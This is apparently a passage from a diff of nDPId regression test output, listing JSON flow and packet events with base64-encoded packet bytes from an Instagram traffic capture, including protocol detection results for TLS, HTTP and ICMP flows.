V8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXX
p7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheB
r1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} +01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0
rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNMq1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhMNBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} +02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmv
EL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MCV8zapTpFVeDqmiCnEMr1A22q06nZsJij0BS+jpAlud6+DjOPKWljFzy06Xn15YGW3Dm07Vi1rGNQXnlLIYZbH\/Lf9VbK8rn+tf2U4X+kmR\/seSiHTIiCrfQRY82NcG+s2JE\/3RNuUUsdP3+A8UZATxsKmMNb9p9jduLcV5NSz3qcz\/E+TORnhzC5qM5iDlSbThKZAPEgvS54QGz00rdEYWdvIwL1jLd2l2yP9aEoOWrH+sNsRBCU97PG1IRhRS5jctVYyDntPEBlAbqGj6sdT5C6POfN9JdpaIsZmGaMmnU0z4bjokazZ5F6F501SFGcsFKmgoCdZLCQyyA\/CkkbqEF1LeEPM1KkE88DAsVjRhjRCz9D6VKRt8PZdtywXXp7E7yF8+4SN\/2h5CqHv4N+v+ejLyvCd2t1L4BFuJ7BTwaB6NicxBq3cWSEeADsWxC4xODPl+fmk90gThIrGh3\/E3G\/K8LjJkXPwBqDPoSCAh\/lyvY4cI9USKSjdTboTHfChgT73IzMJk4MESnvGhexHkwWw4ndKaJ88XZfXiGJCI\/GHCwJX7Zu\/IG7bV7st4TnImk\/Ds\/xEG7y3JgmTAc9wIRPfDmTaMW0XI0vpt5j1BnCLq+es4TBuh9vggrd8U5G3S+2hj2u1HQPo3wjRAM4dNo6in8nnmD4n\/\/G9yrHWQwizkMQMUhZbY0jDslavyFSGnWc0JVIhfEzkCZm+lGdYxoDPUYKjjFRFeJ8o"} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} 
00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908464,"flow_last_seen":1436720908464,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1436720908464,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.471674} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1436720908464,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1436720908464,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRcAAEABOq\/AqABnwKgAZwMDE08AAAAARQAAPFm5QABABkodwKgAZ63CKBTA+AG7+Mu3wgAAAACgAjkIlxQAAAIEBbQEAggKAAPuewAAAAABAwMG"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} 
-00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} 
